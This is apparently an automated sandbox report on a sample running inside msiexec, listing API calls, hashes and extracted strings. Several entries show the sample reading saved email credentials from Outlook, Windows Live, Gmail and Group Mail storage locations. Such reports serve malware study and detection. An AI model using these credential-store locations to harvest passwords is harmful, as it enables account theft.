                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 2881943006-572158859
                                                                                              • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                              • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                              • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                              • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                              APIs
                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 888011440-2039793938
                                                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                              APIs
                                                                                              Strings
                                                                                              • database %s is already in use, xrefs: 0042E9CE
                                                                                              • too many attached databases - max %d, xrefs: 0042E951
                                                                                              • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                              • database is already attached, xrefs: 0042EA97
                                                                                              • out of memory, xrefs: 0042EBEF
                                                                                              • unable to open database: %s, xrefs: 0042EBD6
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                              • API String ID: 1297977491-2001300268
                                                                                              • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                              APIs
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409C53
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00409C6F
                                                                                              • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                              • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D3D
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00409D47
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D7F
                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                              • String ID: 0wE$d
                                                                                              • API String ID: 2915808112-1552800882
                                                                                              • Opcode ID: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
                                                                                              • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                              • Opcode Fuzzy Hash: 583de707addaa969329ba30793de7e83f95f566a01afaa3ae0a642996af24538
                                                                                              • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402C9D
                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                              • memset.MSVCRT ref: 00402CF7
                                                                                              • sprintf.MSVCRT ref: 00402D10
                                                                                              • sprintf.MSVCRT ref: 00402D4E
                                                                                                • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$sprintf$Enum
                                                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                              • API String ID: 4097761685-3814494228
                                                                                              • Opcode ID: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                              • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                              • Opcode Fuzzy Hash: 869051c230eb502fc44b367a44f21f84098f34e7cd62e2c849a0e400a837e146
                                                                                              • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                              APIs
                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                              • API String ID: 1348940319-1729847305
                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 78143705-3916222277
                                                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                              APIs
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              • memset.MSVCRT ref: 0040FA1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                              • API String ID: 945165440-3589380929
                                                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F84A
                                                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                              • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                              • String ID: Creds$ps:password
                                                                                              • API String ID: 2290531041-1872227768
                                                                                              • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                              • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                              • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                              • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                              APIs
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                              • strchr.MSVCRT ref: 0040371F
                                                                                              • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                              • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                              • strlen.MSVCRT ref: 00403778
                                                                                              • sprintf.MSVCRT ref: 0040379C
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                              • String ID: %s@gmail.com
                                                                                              • API String ID: 3261640601-4097000612
                                                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 3411445237-4169760276
                                                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403504
                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscatmemset$_mbscpystrlen
                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                              • API String ID: 632640181-966475738
                                                                                              • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                              • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                              • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$DialogMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2485852401-0
                                                                                              • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                              • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                              • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                              • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                              • String ID:
                                                                                              • API String ID: 3642520215-0
                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                              • memset.MSVCRT ref: 00405C3B
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                              • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                              • Opcode Fuzzy Hash: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                                                              • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                              • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                              • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Defer$Rect$BeginClient
                                                                                              • String ID:
                                                                                              • API String ID: 2126104762-0
                                                                                              • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                              • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                              • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                              • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1999381814-0
                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                              • API String ID: 1297977491-3883738016
                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
